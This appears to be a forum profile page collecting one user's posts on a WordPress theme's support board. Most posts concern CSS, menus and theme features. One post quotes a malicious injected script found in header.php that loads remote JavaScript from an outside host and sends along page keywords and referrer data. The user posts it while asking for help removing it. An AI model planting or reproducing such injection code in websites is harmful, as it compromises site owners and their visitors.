Home User profile
tagDiv Member
This user did not write anything. So we are just showing here some random text to make the profile page look nice :)
yoluca
tagDiv Member

hi, thanks for getting back to me …

i managed to get the post_type …

but i cannot get the filter to work …

#1 i have post_type=services so in block filter i put this for Post Type:
#2 for filter i have services-category i tried to place this on every filed in block settings but it not showing any filters…

what am i doing wrong here ?

thanks

yoluca
tagDiv Member

In settings it’s enabled …

i do not use none anywhere, unless the say what? applies it automatically…

Thanks

yoluca
tagDiv Member

works … thank you

site url to check grid 10 with no date >>> goo.gl/SDPlbc

thanks

yoluca
tagDiv Member

Thank you … i will test by removing all ads and see if they still show ..

thanks for your reply

yoluca
tagDiv Member

Since the malware occur in the header.php of your theme folder, this suggest that the theme have security issues. I would recommend you to consider contacting the theme developers for security hardening or to change to another theme.

In case you need any further assistance, please do not hesitate to contact us.

Kind Regards,

Jack Mason
Technical Support Team
FastComet.com

yoluca
tagDiv Member

hi, please help. i dont know what else i can do to stop this malware code.

everyday i have to manually remove it from theme folder header.php file.

<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://www.schreibwaren-wetzlar.de/js/jquery.min.php?c_utt=J18171&c_utm='+encodeURIComponent('http://www.schreibwaren-wetzlar.de/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>

i have fallowed everything found on wordpress.org blog to remove and prevent malware…

i removed all folders and files …except config file and wp-contents folder … and re-uploaded fresh wordpress files …

also … deleted all themes and plugins … and reinstalled …

i changed wordpress prefix wp to something else …

changed all passwords …etc ..

what am i missing ?

thanks

yoluca
tagDiv Member

My .htaccess looks like this

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

<IfModule pagespeed_module>
ModPagespeed on
ModPagespeedEnableFilters collapse_whitespace
ModPagespeedEnableFilters remove_comments
ModPagespeedEnableFilters rewrite_images
ModPagespeedEnableFilters insert_dns_prefetch
</IfModule>

#Prevent Directory Browsing
Options All -Indexes
#Prevent Directory Browsing

#Prevent Image Hot Linking
RewriteEngine On RewriteCond %{HTTP_REFERER} !^$ RewriteCond %{HTTP_REFERER} !^http://(www\.)?regatulunit.com/.*$ [NC] RewriteRule \.(gif|jpg)$ http://www.regatulunit.com/hotlink.gif [R,L]
#Prevent Image Hot Linking

# Do not allow access to hidden php files
RewriteRule ^\.(.*)\.php$ – [F]
# Do not allow access to hidden php files

#Protect Your WordPress Configuration wp-config.php File
<files wp-config.php>
order allow,deny
deny from all
</files>
#Protect Your WordPress Configuration wp-config.php File

#Protect .htaccess From Unauthorized Access
<files ~ "^.*\.([Hh][Tt][Aa])">
order allow,deny
deny from all
satisfy all
</files>
#Protect .htaccess From Unauthorized Access

yoluca
tagDiv Member

Hi,

Ok i no longer need this … what i want is to have current menu/active menu this color >> #d13030

also for hover same color >>> #d13030

so i applied

.sf-menu a:focus, .sf-menu a:hover, .sf-menu a:active {
color: #d13030 !important;
}

which works fine for hover …. but soon i select a menu which becomes the active menu …. it doesnt stay red >>> color: #d13030

please advice

in panel theme colors ACTIVE & HOVER COLOR only changes the small line under menu ….. not the menu itself … so i have this set to transparent ….

thanks

yoluca
tagDiv Member

http://tinypic.com/r/282dnb4/9

the css style i apply , seems to be overwritten by original style for same area ….

.td-boxed-layout .td-header-style-3 .td-header-menu-wrap, .td-boxed-layout .td-header-style-4 .td-header-menu-wrap {
    background-color: #EFEFEF !important;
}

which is from admin panel settings …. overwrites custom code ….

.td-boxed-layout .td-header-style-3 .td-header-menu-wrap, .td-boxed-layout .td-header-style-4 .td-header-menu-wrap {
    background-color: transparent !important;
}

i just need the main menu background to be same width as website contend area ….

thanks

  • This reply was modified 10 years by yoluca.
yoluca
tagDiv Member

this is what i have :

.td-post-template-2 .td-post-featured-image img {
margin: 0 auto;
}

.td-post-template-2 .td-post-featured-image .wp-caption-text {
text-align: center;
}

.td-boxed-layout .td-header-menu-wrap .td-boxed-layout .td-header-menu-wrap {
background-color: transparent;
}

.maincategoryclass {
background: #EFEDE1 none repeat scroll 0% 0%;
}

please advice

yoluca
tagDiv Member

Its not working …

I applied the style in custom code admin panel …. Deleted cache refresh page … Nothing

Thanks

yoluca
tagDiv Member

i managed to use this custom css and works …
is this the right way to do it ?

thanks

/*featured image center */
.td-post-content p, .mce-content-body p, .comment-content p {
margin-left: 16px;
}

.td-post-content img, .mce-content-body img {
margin-left: 16px;
}

yoluca
tagDiv Member

great …

thank you

yoluca
tagDiv Member

thank you …

td_module_single.php didnt quite worked for me ….

here you have screenshots ….

Image and video hosting by TinyPic

Image and video hosting by TinyPic

thank you

yoluca
tagDiv Member

would also like

Possibility to disable/enable ‘more from author’ and ‘related articles’ on single page individually.

Possibility to disable/enable ‘more from author’ and ‘related articles’ on mobile view

yoluca
tagDiv Member

Chris S

great info here …
how about moving hosting ? would be nice a guide as good as the one above 🙂

yoluca
tagDiv Member

im also looking for bbpress styling ….

thanks newspaper was great for bbpress

  • This reply was modified 11 years by yoluca.
yoluca
tagDiv Member

default theme works fine

yoluca
tagDiv Member

i would also like 980px option back …

i think it has been removed since 4.0 …

why did they remove it ???

thanks

yoluca
tagDiv Member

hi,

disabled all plugins … that comma is still there …

so its something else causing it :))

thanks

yoluca
tagDiv Member

Error in jQuery.ajax while submitting a form:SyntaxError: JSON.parse: unexpected character at line 1 column 1 of the JSON data

yoluca
tagDiv Member

**update

in mobile view works great now …

in chrome , firefox and explorer still not working …

thanks

yoluca
tagDiv Member

Just my thoughts. All of these “bloat” elements really slow down the site, page load,

so does the ” tagDiv Social Counter ” … and many other features on this theme …

but since its a feature … there is an option to be turned on or off …

come on dude … the more features … the better :)) just look at ” avada ”

yoluca
tagDiv Member

if you dont … then your reply

I’m very happy the way the theme is right now,clean,professional and simple adding more things only put more weight on ur site and make it slow etc..

ruins the topic

where mobile is taking over PC any way..all those things will not even be able to show on any mobile phone..this is not 2001 dude.

u are not telling me that ” the Guardian ” are not aware of this ” 2014 ” thing ?? are you ? :)))

i didnt even mentioned mobile …

they dont have to be visible in mobile … like most other things .. 🙂

  • This reply was modified 12 years by yoluca.
yoluca
tagDiv Member

and my last one The Guardian

#1 full search bar
#2 different menu colours
#3 weather
#4 breaking news

Image and video hosting by TinyPic

Viewing 25 posts - 1 through 25 (of 90 total)